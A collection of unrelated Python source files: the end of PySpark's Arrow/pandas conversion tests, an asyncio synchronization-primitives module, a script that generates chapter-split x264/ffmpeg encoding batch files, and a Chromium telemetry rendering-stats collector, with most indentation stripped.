self.spark.createDataFrame(pdf, schema=schema)
else:
df_arrow = self.spark.createDataFrame(pdf, schema=schema)
result = df.collect()
result_arrow = df_arrow.collect()
self.assertEqual(len(result), len(result_arrow))
for row, row_arrow in zip(result, result_arrow):
i, m = row
_, m_arrow = row_arrow
self.assertEqual(m, map_data[i])
self.assertEqual(m_arrow, map_data[i])
def test_toPandas_with_map_type(self):
pdf = pd.DataFrame({"id": [0, 1, 2, 3],
"m": [{}, {"a": 1}, {"a": 1, "b": 2}, {"a": 1, "b": 2, "c": 3}]})
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
df = self.spark.createDataFrame(pdf, schema="id long, m map<string, long>")
if LooseVersion(pa.__version__) < LooseVersion("2.0.0"):
with QuietTest(self.sc):
with self.assertRaisesRegex(Exception, "MapType.*only.*pyarrow 2.0.0"):
df.toPandas()
else:
pdf_non, pdf_arrow = self._toPandas_arrow_toggle(df)
assert_frame_equal(pdf_arrow, pdf_non)
def test_toPandas_with_map_type_nulls(self):
pdf = pd.DataFrame({"id": [0, 1, 2, 3, 4],
"m": [{"a": 1}, {"b": 2, "c": 3}, {}, None, {"d": None}]})
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
df = self.spark.createDataFrame(pdf, schema="id long, m map<string, long>")
if LooseVersion(pa.__version__) < LooseVersion("2.0.0"):
with QuietTest(self.sc):
with self.assertRaisesRegex(Exception, "MapType.*only.*pyarrow 2.0.0"):
df.toPandas()
else:
pdf_non, pdf_arrow = self._toPandas_arrow_toggle(df)
assert_frame_equal(pdf_arrow, pdf_non)
def test_createDataFrame_with_int_col_names(self):
import numpy as np
pdf = pd.DataFrame(np.random.rand(4, 2))
df, df_arrow = self._createDataFrame_toggle(pdf)
pdf_col_names = [str(c) for c in pdf.columns]
self.assertEqual(pdf_col_names, df.columns)
self.assertEqual(pdf_col_names, df_arrow.columns)
def test_createDataFrame_fallback_enabled(self):
ts = datetime.datetime(2015, 11, 1, 0, 30)
with QuietTest(self.sc):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.fallback.enabled": True}):
with warnings.catch_warnings(record=True) as warns:
# we want the warnings to appear even if this test is run from a subclass
warnings.simplefilter("always")
df = self.spark.createDataFrame(
pd.DataFrame({"a": [[ts]]}), "a: array<timestamp>")
# Catch and check the last UserWarning.
user_warns = [
warn.message for warn in warns if isinstance(warn.message, UserWarning)]
self.assertTrue(len(user_warns) > 0)
self.assertTrue(
"Attempting non-optimization" in str(user_warns[-1]))
self.assertEqual(df.collect(), [Row(a=[ts])])
def test_createDataFrame_fallback_disabled(self):
with QuietTest(self.sc):
with self.assertRaisesRegexp(TypeError, 'Unsupported type'):
self.spark.createDataFrame(
pd.DataFrame({"a": [[datetime.datetime(2015, 11, 1, 0, 30)]]}),
"a: array<timestamp>")
# Regression test for SPARK-23314
def test_timestamp_dst(self):
# Daylight saving time for Los Angeles for 2015 is Sun, Nov 1 at 2:00 am
dt = [datetime.datetime(2015, 11, 1, 0, 30),
datetime.datetime(2015, 11, 1, 1, 30),
datetime.datetime(2015, 11, 1, 2, 30)]
pdf = pd.DataFrame({'time': dt})
df_from_python = self.spark.createDataFrame(dt, 'timestamp').toDF('time')
df_from_pandas = self.spark.createDataFrame(pdf)
assert_frame_equal(pdf, df_from_python.toPandas())
assert_frame_equal(pdf, df_from_pandas.toPandas())
# Regression test for SPARK-28003
def test_timestamp_nat(self):
dt = [pd.NaT, pd.Timestamp('2019-06-11'), None] * 100
pdf = pd.DataFrame({'time': dt})
df_no_arrow, df_arrow = self._createDataFrame_toggle(pdf)
assert_frame_equal(pdf, df_no_arrow.toPandas())
assert_frame_equal(pdf, df_arrow.toPandas())
def test_toPandas_batch_order(self):
def delay_first_part(partition_index, iterator):
if partition_index == 0:
time.sleep(0.1)
return iterator
# Collects Arrow RecordBatches out of order in driver JVM then re-orders in Python
def run_test(num_records, num_parts, max_records, use_delay=False):
df = self.spark.range(num_records, numPartitions=num_parts).toDF("a")
if use_delay:
df = df.rdd.mapPartitionsWithIndex(delay_first_part).toDF()
with self.sql_conf({"spark.sql.execution.arrow.maxRecordsPerBatch": max_records}):
pdf, pdf_arrow = self._toPandas_arrow_toggle(df)
assert_frame_equal(pdf, pdf_arrow)
cases = [
            (1024, 512, 2),  # Use many partitions to make out-of-order collection more likely
(64, 8, 2, True), # Use delay in first partition to force collecting out of order
(64, 64, 1), # Test single batch per partition
(64, 1, 64), # Test single partition, single batch
(64, 1, 8), # Test single partition, multiple batches
(30, 7, 2), # Test different sized partitions
]
for case in cases:
run_test(*case)
def test_createDateFrame_with_category_type(self):
pdf = pd.DataFrame({"A": [u"a", u"b", u"c", u"a"]})
pdf["B"] = pdf["A"].astype('category')
category_first_element = dict(enumerate(pdf['B'].cat.categories))[0]
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": True}):
arrow_df = self.spark.createDataFrame(pdf)
arrow_type = arrow_df.dtypes[1][1]
result_arrow = arrow_df.toPandas()
arrow_first_category_element = result_arrow["B"][0]
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
df = self.spark.createDataFrame(pdf)
spark_type = df.dtypes[1][1]
result_spark = df.toPandas()
spark_first_category_element = result_spark["B"][0]
assert_frame_equal(result_spark, result_arrow)
# ensure original category elements are string
self.assertIsInstance(category_first_element, str)
        # the column dtype, with and without Arrow enabled, must match the pandas string type
self.assertEqual(spark_type, 'string')
self.assertEqual(arrow_type, 'string')
self.assertIsInstance(arrow_first_category_element, str)
self.assertIsInstance(spark_first_category_element, str)
def test_createDataFrame_with_float_index(self):
# SPARK-32098: float index should not produce duplicated or truncated Spark DataFrame
self.assertEqual(
self.spark.createDataFrame(
pd.DataFrame({'a': [1, 2, 3]}, index=[2., 3., 4.])).distinct().count(), 3)
def test_no_partition_toPandas(self):
# SPARK-32301: toPandas should work from a Spark DataFrame with no partitions
# Forward-ported from SPARK-32300.
pdf = self.spark.sparkContext.emptyRDD().toDF("col1 int").toPandas()
self.assertEqual(len(pdf), 0)
self.assertEqual(list(pdf.columns), ["col1"])
def test_createDataFrame_empty_partition(self):
pdf = pd.DataFrame({"c1": [1], "c2": ["string"]})
df = self.spark.createDataFrame(pdf)
self.assertEqual([Row(c1=1, c2='string')], df.collect())
self.assertGreater(self.spark.sparkContext.defaultParallelism, len(pdf))
@unittest.skipIf(
not have_pandas or not have_pyarrow,
pandas_requirement_message or pyarrow_requirement_message) # type: ignore
class MaxResultArrowTests(unittest.TestCase):
    # These tests are separate because 'spark.driver.maxResultSize' is a
    # static configuration of the Spark context.
@classmethod
def setUpClass(cls):
cls.spark = SparkSession(SparkContext(
'local[4]', cls.__name__, conf=SparkConf().set("spark.driver.maxResultSize", "10k")))
# Explicitly enable Arrow and disable fallback.
cls.spark.conf.set("spark.sql.execution.arrow.pyspark.enabled", "true")
cls.spark.conf.set("spark.sql.execution.arrow.pyspark.fallback.enabled", "false")
@classmethod
def tearDownClass(cls):
if hasattr(cls, "spark"):
cls.spark.stop()
def test_exception_by_max_results(self):
with self.assertRaisesRegexp(Exception, "is bigger than"):
self.spark.range(0, 10000, 1, 100).toPandas()
class EncryptionArrowTests(ArrowTests):
@classmethod
def conf(cls):
return super(EncryptionArrowTests, cls).conf().set("spark.io.encryption.enabled", "true")
if __name__ == "__main__":
from pyspark.sql.tests.test_arrow import * # noqa: F401
try:
import xmlrunner # type: ignore
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
|
"""Synchronization primitives."""
__all__ = ['Lock', 'Event', 'Condition', 'Semaphore', 'BoundedSemaphore']
import collections
from . import events
from . import futures
from .coroutines import coroutine
class _ContextManager:
"""Context manager.
This enables the following idiom for acquiring and releasing a
lock around a block:
with (yield from lock):
<block>
while failing loudly when accidentally using:
with lock:
<block>
"""
def __init__(self, lock):
self._lock = lock
def __enter__(self):
# We have no use for the "as ..." clause in the with
# statement for locks.
return None
def __exit__(self, *args):
try:
self._lock.release()
finally:
self._lock = None # Crudely prevent reuse.
class Lock:
"""Primitive lock objects.
A primitive lock is a synchronization primitive that is not owned
by a particular coroutine when locked. A primitive lock is in one
of two states, 'locked' or 'unlocked'.
It is created in the unlocked state. It has two basic methods,
acquire() and release(). When the state is unlocked, acquire()
changes the state to locked and returns immediately. When the
state is locked, acquire() blocks until a call to release() in
another coroutine changes it to unlocked, then the acquire() call
resets it to locked and returns. The release() method should only
be called in the locked state; it changes the state to unlocked
and returns immediately. If an attempt is made to release an
unlocked lock, a RuntimeError will be raised.
When more than one coroutine is blocked in acquire() waiting for
the state to turn to unlocked, only one coroutine proceeds when a
    release() call resets the state to unlocked: the first coroutine that
    blocked in acquire() is the one that proceeds.
acquire() is a coroutine and should be called with 'yield from'.
Locks also support the context management protocol. '(yield from lock)'
should be used as context manager expression.
Usage:
lock = Lock()
...
yield from lock
try:
...
finally:
lock.release()
Context manager usage:
lock = Lock()
...
with (yield from lock):
...
Lock objects can be tested for locking state:
if not lock.locked():
yield from lock
else:
# lock is acquired
...
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._locked = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self._locked else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Return True if lock is acquired."""
return self._locked
@coroutine
def acquire(self):
"""Acquire a lock.
This method blocks until the lock is unlocked, then sets it to
locked and returns True.
"""
if not self._waiters and not self._locked:
self._locked = True
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._locked = True
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a lock.
When the lock is locked, reset it to unlocked, and return.
If any other coroutines are blocked waiting for the lock to become
unlocked, allow exactly one of them to proceed.
When invoked on an unlocked lock, a RuntimeError is raised.
There is no return value.
"""
if self._locked:
self._locked = False
# Wake up the first waiter who isn't cancelled.
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
break
else:
raise RuntimeError('Lock is not acquired.')
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
# This must exist because __enter__ exists, even though that
# always raises; that's how the with-statement works.
pass
def __iter__(self):
# This is not a coroutine. It is meant to enable the idiom:
#
# with (yield from lock):
# <block>
#
# as an alternative to:
#
# yield from lock.acquire()
# try:
# <block>
# finally:
# lock.release()
yield from self.acquire()
return _ContextManager(self)
class Event:
"""Asynchronous equivalent to threading.Event.
Class implementing event objects. An event manages a flag that can be set
to true with the set() method and reset to false with the clear() method.
The wait() method blocks until the flag is true. The flag is initially
false.
"""
def __init__(self, *, loop=None):
self._waiters = collections.deque()
self._value = False
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'set' if self._value else 'unset'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def is_set(self):
"""Return True if and only if the internal flag is true."""
return self._value
def set(self):
"""Set the internal flag to true. All coroutines waiting for it to
        become true are awakened. Coroutines that call wait() once the flag is
true will not block at all.
"""
if not self._value:
self._value = True
for fut in self._waiters:
if not fut.done():
fut.set_result(True)
def clear(self):
"""Reset the internal flag to false. Subsequently, coroutines calling
wait() will block until set() is called to set the internal flag
to true again."""
self._value = False
@coroutine
def wait(self):
"""Block until the internal flag is true.
If the internal flag is true on entry, return True
immediately. Otherwise, block until another coroutine calls
set() to set the flag to true, then return True.
"""
if self._value:
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
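# Illustrative sketch (not part of the module): typical Event usage with the
# pre-3.5 coroutine style used here. Names such as 'waiter' are hypothetical.
#
#     event = Event()
#
#     @coroutine
#     def waiter():
#         yield from event.wait()   # blocks until event.set() is called
#         ...
#
#     event.set()   # wakes every coroutine blocked in wait()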
class Condition:
"""Asynchronous equivalent to threading.Condition.
This class implements condition variable objects. A condition variable
allows one or more coroutines to wait until they are notified by another
coroutine.
A new Lock object is created and used as the underlying lock.
"""
def __init__(self, lock=None, *, loop=None):
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
if lock is None:
lock = Lock(loop=self._loop)
elif lock._loop is not self._loop:
raise ValueError("loop argument must agree with lock")
self._lock = lock
# Export the lock's locked(), acquire() and release() methods.
self.locked = lock.locked
self.acquire = lock.acquire
self.release = lock.release
self._waiters = collections.deque()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked'
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
@coroutine
def wait(self):
"""Wait until notified.
If the calling coroutine has not acquired the lock when this
method is called, a RuntimeError is raised.
This method releases the underlying lock, and then blocks
until it is awakened by a notify() or notify_all() call for
the same condition variable in another coroutine. Once
awakened, it re-acquires the lock and returns True.
"""
if not self.locked():
raise RuntimeError('cannot wait on un-acquired lock')
self.release()
try:
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
return True
finally:
self._waiters.remove(fut)
finally:
yield from self.acquire()
@coroutine
def wait_for(self, predicate):
"""Wait until a predicate becomes true.
The predicate should be a callable whose result will be
interpreted as a boolean value. The final predicate value is
the return value.
"""
result = predicate()
while not result:
yield from self.wait()
result = predicate()
return result
def notify(self, n=1):
"""By default, wake up one coroutine waiting on this condition, if any.
If the calling coroutine has not acquired the lock when this method
is called, a RuntimeError is raised.
This method wakes up at most n of the coroutines waiting for the
condition variable; it is a no-op if no coroutines are waiting.
Note: an awakened coroutine does not actually return from its
wait() call until it can reacquire the lock. Since notify() does
not release the lock, its caller should.
"""
if not self.locked():
raise RuntimeError('cannot notify on un-acquired lock')
idx = 0
for fut in self._waiters:
if idx >= n:
break
if not fut.done():
idx += 1
fut.set_result(False)
def notify_all(self):
"""Wake up all coroutines waiting on this condition. This method acts
like notify(), but wakes up all waiting coroutines instead of one. If the
calling coroutine has not acquired the lock when this method is called,
a RuntimeError is raised.
"""
self.notify(len(self._waiters))
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class Semaphore:
"""A Semaphore implementation.
A semaphore manages an internal counter which is decremented by each
acquire() call and incremented by each release() call. The counter
can never go below zero; when acquire() finds that it is zero, it blocks,
waiting until some other thread calls release().
Semaphores also support the context management protocol.
The optional argument gives the initial value for the internal
counter; it defaults to 1. If the value given is less than 0,
ValueError is raised.
"""
def __init__(self, value=1, *, loop=None):
if value < 0:
raise ValueError("Semaphore initial value must be >= 0")
self._value = value
self._waiters = collections.deque()
if loop is not None:
self._loop = loop
else:
self._loop = events.get_event_loop()
def __repr__(self):
res = super().__repr__()
extra = 'locked' if self.locked() else 'unlocked,value:{}'.format(
self._value)
if self._waiters:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
return '<{} [{}]>'.format(res[1:-1], extra)
def locked(self):
"""Returns True if semaphore can not be acquired immediately."""
return self._value == 0
@coroutine
def acquire(self):
"""Acquire a semaphore.
If the internal counter is larger than zero on entry,
decrement it by one and return True immediately. If it is
zero on entry, block, waiting until some other coroutine has
called release() to make it larger than 0, and then return
True.
"""
if not self._waiters and self._value > 0:
self._value -= 1
return True
fut = futures.Future(loop=self._loop)
self._waiters.append(fut)
try:
yield from fut
self._value -= 1
return True
finally:
self._waiters.remove(fut)
def release(self):
"""Release a semaphore, incrementing the internal counter by one.
When it was zero on entry and another coroutine is waiting for it to
become larger than zero again, wake up that coroutine.
"""
self._value += 1
for waiter in self._waiters:
if not waiter.done():
waiter.set_result(True)
break
def __enter__(self):
raise RuntimeError(
'"yield from" should be used as context manager expression')
def __exit__(self, *args):
pass
def __iter__(self):
# See comment in Lock.__iter__().
yield from self.acquire()
return _ContextManager(self)
class BoundedSemaphore(Semaphore):
"""A bounded semaphore implementation.
This raises ValueError in release() if it would increase the value
above the initial value.
"""
def __init__(self, value=1, *, loop=None):
self._bound_value = value
super().__init__(value, loop=loop)
def release(self):
if self._value >= self._bound_value:
raise ValueError('BoundedSemaphore released too many times')
super().release()
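# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): a minimal example of
# the "with (yield from lock)" idiom documented in Lock.__iter__() above,
# exercising this module's Lock and Event on the default event loop.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    loop = events.get_event_loop()
    lock = Lock(loop=loop)
    event = Event(loop=loop)

    @coroutine
    def demo():
        # acquire the lock, run the block, release on exit of the with-block
        with (yield from lock):
            event.set()
        # the flag is already set, so wait() returns True immediately
        return (yield from event.wait())

    print(loop.run_until_complete(demo()))  # expected: True
    loop.close()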
|
|
#!/usr/bin/env python
# chapparse.py
import sys, re, getopt, os
from string import Template
name = 'chapparse.py'
version = '0.4'
rat = re.compile(r'(\d+)(?:/|:)(\d+)')
chapre = re.compile(r"CHAPTER\d+=(\S+)",re.I)
x264 = 'x264-64'
ffmpeg = 'ffmpeg'
mkvmerge = 'mkvmerge'
avs2yuv = 'avs2yuv'
timeCodes = frameNumbers = merge = []
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "i:o:f:b:e:s:a:x:c:hmr",['help','avs=','test','x264opts='])
except getopt.GetoptError as err:
print(err)
help()
sys.exit()
set = dict(input='video.mkv',output='',audio='',index='',
fps='24000/1001',batch='',method='x264',resize='',avs='',mergeFiles=False,removeFiles=False,
x264opts='--preset placebo --crf 16 --level 41 --rc-lookahead 250',test=False,
x264=x264,ffmpeg=ffmpeg,mkvmerge=mkvmerge,avs2yuv=avs2yuv,chapters='chapters.txt',crop='0,0,0,0')
for o, v in opts:
if o == '-i':
set['input'] = v
elif o == '-o':
set['output'] = v[:-4]
elif o == '-f':
set['fps'] = v
elif o == '-b':
set['batch'] = v
elif o == '-e':
set['method'] = v
elif o == '-s':
set['resize'] = v
elif o == '-c':
set['crop'] = v
elif o in ('-x','--x264opts'):
set['x264opts'] = v
elif o == '-a':
set['audio'] = v
elif o in ('-h','--help'):
help()
sys.exit()
elif o == '-m':
set['mergeFiles'] = True
elif o == '-r':
set['removeFiles'] = True
elif o == '--avs':
set['avs'] = v
elif o == '--test':
set['test'] = True
else:
assert False, "unhandled option"
set['chapters'] = set['chapters'] if len(args) != 1 else args[0]
if set['output'] == '':
set['output'] = set['input'][:-4]+'.encode'
if set['avs'] == '' and set['method'] == 'avisynth':
set['avs'] = set['output']+'.avs'
if set['avs'] != '' and set['method'] == 'x264':
set['method'] = 'avisynth'
if set['batch'] == '':
set['batch'] = set['output']+'.bat'
if os.path.isfile(set['chapters']) != True:
print("You must set a valid OGM chapters file.")
sys.exit(2)
if set['test'] == True:
for key in sorted(set):
print(key.ljust(8),'=',set[key])
print()
timeStrings = parseOgm(args[0])
timeCodes = [time2ms(timeString) for timeString in timeStrings]
frameNumbers = [ms2frame(timeCode,set['fps']) for timeCode in timeCodes]
set['cmd'] = Template('${piper}"${x264}" ${x264opts} --demuxer y4m${end} - -o "${output}-part${part}.mkv"')
if set['method'] == 'avisynth':
set['avs'] = '"%s"' % set['avs']
if set['test'] == False:
set = writeAvisynth(set,frameNumbers)
else:
print('Writing avisynth script')
elif set['method'] == 'ffmpeg':
set['resize'] = ' -s '+set['resize'] if (set['method'] == 'ffmpeg' and set['resize'] != '') else ''
elif set['method'] == 'x264':
set['cmd'] = Template('"${x264}" ${x264opts}${seek}${end} $xinput -o "${output}-part${part}.mkv"')
set['index'] = '"%s.x264.ffindex"' % set['input'] if set['input'][-3:] in ('mkv','mp4','wmv') else ''
set['xinput'] = '"%s" --index %s' % (set['input'],set['index']) if set['index'] != '' else '"%s"' % set['input']
x264crop = 'crop:'+set['crop'] if (set['method'] == 'x264' and set['crop'] != '0,0,0,0') else ''
x264resize='resize:'+','.join(set['resize'].split('x')) if (set['method'] == 'x264' and set['resize'] != '') else ''
sep = '/' if (x264crop != '' and x264resize != '') else ''
set['x264opts'] = set['x264opts']+' --vf %s%s%s' % (x264crop,sep,x264resize) if (x264crop != '' or x264resize != '') else set['x264opts']
writeBatch(set,frameNumbers,timeStrings)
def help():
print("""
%s %s
Usage: chapparse.py [options] chapters.txt
chapters.txt is an OGM chapters file providing the chapter points at which to
separate the encodes
Options:
-i video.mkv
Video to be encoded
-o encode.mkv
Encoded video
-f 24000/1001
Frames per second
-s 1280x720
Resolution to resize to (no default)
-e x264
Method of resizing [avisynth,ffmpeg,x264]
-a audio.m4a
Audio to mux in the final file
-b encode.bat
Batch file with the instructions for chapter-separated encode
-x "--preset placebo --crf 16 --level 41 --rc-lookahead 250", --x264opts
x264 options (don't use --demuxer, --input, --output or --frames)
--avs encode.avs
If using avisynth method
-m
Merge parts
-r
Remove extra files
-h, --help
This help file""" % (name,version))
def time2ms(ts):
t = ts.split(':')
h = int(t[0]) * 3600000
m = h + int(t[1]) * 60000
ms = round(m + float(t[2]) * 1000)
return ms
def ms2frame(ms,fps):
s = ms / 1000
fps = rat.search(fps).groups() if rat.search(fps) else \
[re.search(r'(\d+)',fps).group(0),'1']
frame = round((int(fps[0])/int(fps[1])) * s)
return frame
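# Worked example (illustrative values only, not taken from a real chapters
# file):
#   time2ms('00:03:25.117')        -> 0*3600000 + 3*60000 + 25117 = 205117 ms
#   ms2frame(205117, '24000/1001') -> round(24000/1001 * 205.117) = 4918 frames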
def parseOgm(file):
timeStrings = []
with open(file) as chapFile:
for line in chapFile:
timeString = chapre.match(line)
if timeString != None:
timeStrings.append(timeString.group(1))
return timeStrings
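# Example of a (hypothetical) OGM chapters file accepted by parseOgm(); only
# the CHAPTERxx= timestamp lines match the chapre pattern above, the
# CHAPTERxxNAME= lines are ignored:
#
#   CHAPTER01=00:00:00.000
#   CHAPTER01NAME=Opening
#   CHAPTER02=00:03:25.117
#   CHAPTER02NAME=Part A
#
# For that file parseOgm() returns ['00:00:00.000', '00:03:25.117'].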
def writeAvisynth(set,frameNumbers):
# needs dict with 'avs', 'input', 'resize' (if needed) and list with frameNumbers
if os.path.isfile(set['avs'][1:-1]) != True:
with open(set['avs'][1:-1],'w') as avs:
if set['input'][-4:] in ('.mkv','.wmv','.mp4'):
avs.write('FFVideoSource("%s")\n' % set['input'])
elif set['input'][-4:] == '.avi':
avs.write('AviSource("%s")\n' % set['input'])
elif set['input'] != '':
avs.write('DirectShowSource("%s")\n' % set['input'])
if set['resize'] != '':
avs.write('Spline36Resize(%s)\n' % ','.join(set['resize'].split('x')))
avs.write('+'.join(['Trim(%d,%d)' % (frameNumbers[i],frameNumbers[i+1]-1) for i in range(len(frameNumbers)-1)]))
avs.write('+Trim(%d,0)\n' % frameNumbers[-1])
else:
with open(set['avs'][1:-1],'a') as avs:
avs.write('\n')
avs.write('+'.join(['Trim(%d,%d)' % (frameNumbers[i],frameNumbers[i+1]-1) for i in range(len(frameNumbers)-1)]))
avs.write('+Trim(%d,0)\n' % frameNumbers[-1])
set['resize'] = ''
if set['input'][-3:] in ('mkv','wmv','mp4'):
set['index'] = '"%s.mkv.ffindex"' % set['output']
return set
def cmdMake(set,frameNumbers,timeStrings,i):
begin = frameNumbers[i]
frames = frameNumbers[i+1]-begin if i != len(frameNumbers)-1 else 0
if set['method'] == 'avisynth':
set['seek'] = ' -seek %d' % begin
elif set['method'] == 'ffmpeg':
set['seek'] = ' -ss %s' % timeStrings[i]
elif set['method'] == 'x264':
set['seek'] = ' --seek %d' % begin
if frames != 0:
if set['method'] == 'avisynth':
set['frames'] = ' -frames %d' % frames
elif set['method'] == 'ffmpeg':
set['frames'] = ' -vframes %d' % frames
elif set['method'] == 'x264':
set['frames'] = ''
set['end'] = ' --frames %d' % frames
else:
set['end'] = set['frames'] = ''
set['merge'] = '"%s-part%d.mkv"' % (set['output'],i+1)
set['part'] = i+1
if set['method'] == 'avisynth':
set['piper'] = Template('"${avs2yuv}"${seek}${frames} $avs -o - | ')
elif set['method'] == 'ffmpeg':
set['piper'] = Template('"${ffmpeg}" -i "${input}"${resize}${seek}${frames} -f yuv4mpegpipe -sws_flags spline - | ')
if set['method'] in ('avisynth','ffmpeg'):
set['piper'] = set['piper'].substitute(set)
return set
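# Hedged illustration of one generated command line (x264 method, default
# options, hypothetical input "video.mkv", first part starting at frame 0 and
# running 4918 frames); the actual line depends on the chosen method:
#
#   "x264-64" --preset placebo --crf 16 --level 41 --rc-lookahead 250
#       --seek 0 --frames 4918 "video.mkv" --index "video.mkv.x264.ffindex"
#       -o "video.encode-part1.mkv"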
def writeBatch(set,frameNumbers,timeStrings):
if set['test'] == False:
with open(set['batch'],'w') as batch:
merge = []
if os.name == 'posix':
batch.write('#!/bin/sh\n\n')
for i in range(len(frameNumbers)):
set2 = cmdMake(set,frameNumbers,timeStrings,i)
batch.write(set['cmd'].substitute(set2)+'\n')
merge.append(set2['merge'])
if set['mergeFiles'] == True:
batch.write('\n"%s" -o "%s" %s --default-duration "1:%sfps"' % (set['mkvmerge'],set['output']+'.mkv',' +'.join(merge),set['fps']))
if set['audio'] != '':
batch.write(' -D --no-chapters "%s"' % set['audio'])
batch.write(' --chapters "%s"' % set['chapters'])
batch.write('\n')
rem = ' '.join(merge)
if set['removeFiles'] == True and os.name == 'nt':
batch.write('del %s' % rem)
elif set['removeFiles'] == True and os.name == 'posix':
batch.write('rm %s' % rem)
else:
print('Writing batch file')
#print('Example:',set['cmd'].format(cmdMake(set,frameNumbers,timeStrings,3)))
if __name__ == '__main__':
if len(sys.argv) > 1:
main()
else:
print('Usage: chapparse.py [options] chapters.txt')
sys.exit()
|
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import time
import json
import StringIO
from perf_tools import smoothness_metrics
from telemetry.page import page_measurement
#TODO(ernstm,etc): remove this when crbug.com/173327
#(timeline model in telemetry) is done.
class StatsCollector(object):
def __init__(self, events):
"""
Utility class for collecting rendering stats from traces.
events -- An iterable object containing trace events
"""
if not hasattr(events, '__iter__'):
raise Exception('events must be iterable.')
self.events = events
self.pids = None
self.tids = None
self.index = 0
self.total_best_rasterize_time = 0
self.total_best_record_time = 0
self.total_pixels_rasterized = 0
self.total_pixels_recorded = 0
def __len__(self):
return len(self.events)
def __getitem__(self, i):
return self.events[i]
def __setitem__(self, i, v):
self.events[i] = v
def __repr__(self):
return "[%s]" % ",\n ".join([repr(e) for e in self.events])
def seekToNextEvent(self):
event = self.events[self.index]
self.index += 1
return event
def gatherRasterStats(self):
best_rasterize_time = float('inf')
pixels_rasterized = 0
while self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "TileManager::RunRasterTask":
break
elif event["name"] == "Picture::Raster":
if event["ph"] == "B":
rasterize_time_start = event["ts"]
else:
rasterize_duration = event["ts"] - rasterize_time_start
best_rasterize_time = min(best_rasterize_time, rasterize_duration)
pixels_rasterized += event["args"]["num_pixels_rasterized"]
if best_rasterize_time == float('inf'):
best_rasterize_time = 0
return best_rasterize_time, pixels_rasterized
def gatherRecordStats(self):
best_record_time = float('inf')
pixels_recorded = 0
while self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "PicturePile::Update recording loop":
break
elif event["name"] == "Picture::Record":
if event["ph"] == "B":
record_time_start = event["ts"]
width = event["args"]["width"]
height = event["args"]["height"]
pixels_recorded += width*height
else:
record_duration = event["ts"] - record_time_start
best_record_time = min(best_record_time, record_duration)
if best_record_time == float('inf'):
best_record_time = 0
return best_record_time, pixels_recorded
def seekToMeasureNextFrameEvent(self):
while self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "measureNextFrame":
break
def seekToStartEvent(self):
while self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "LayerTreeHost::UpdateLayers":
frame_number = event["args"]["commit_number"]
return frame_number
def seekToStopEvent(self):
while self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "PendingTree" and event["ph"] == "F":
break
def gatherRenderingStats(self):
self.seekToMeasureNextFrameEvent()
frame_number = self.seekToStartEvent()
start_event_index = self.index
self.seekToStopEvent()
stop_event_index = self.index
self.index = start_event_index
while self.index < stop_event_index and self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "TileManager::RunRasterTask" and event["ph"] == "B":
source_frame_number = event["args"]["metadata"]["source_frame_number"]
if source_frame_number == frame_number:
best_rasterize_time, pixels_rasterized = self.gatherRasterStats()
self.total_best_rasterize_time += best_rasterize_time
self.total_pixels_rasterized += pixels_rasterized
elif event["name"] == "PicturePile::Update recording loop" \
and event ["ph"] == "B":
if self.index < stop_event_index:
best_record_time, pixels_recorded = self.gatherRecordStats()
self.total_best_record_time += best_record_time
self.total_pixels_recorded += pixels_recorded
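# Hedged sketch of the trace-event dicts this collector walks; the field
# names mirror the reads above, the values are made up. A raster sequence
# for the measured frame looks roughly like:
#
#   {"name": "measureNextFrame", "ph": "B", "ts": 0}
#   {"name": "LayerTreeHost::UpdateLayers", "ph": "B", "ts": 1,
#    "args": {"commit_number": 7}}
#   {"name": "TileManager::RunRasterTask", "ph": "B", "ts": 2,
#    "args": {"metadata": {"source_frame_number": 7}}}
#   {"name": "Picture::Raster", "ph": "B", "ts": 3}
#   {"name": "Picture::Raster", "ph": "E", "ts": 5,
#    "args": {"num_pixels_rasterized": 4096}}
#   {"name": "TileManager::RunRasterTask", "ph": "E", "ts": 6}
#   {"name": "PendingTree", "ph": "F", "ts": 7}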
def DivideIfPossibleOrZero(numerator, denominator):
if denominator == 0:
return 0
return numerator / denominator
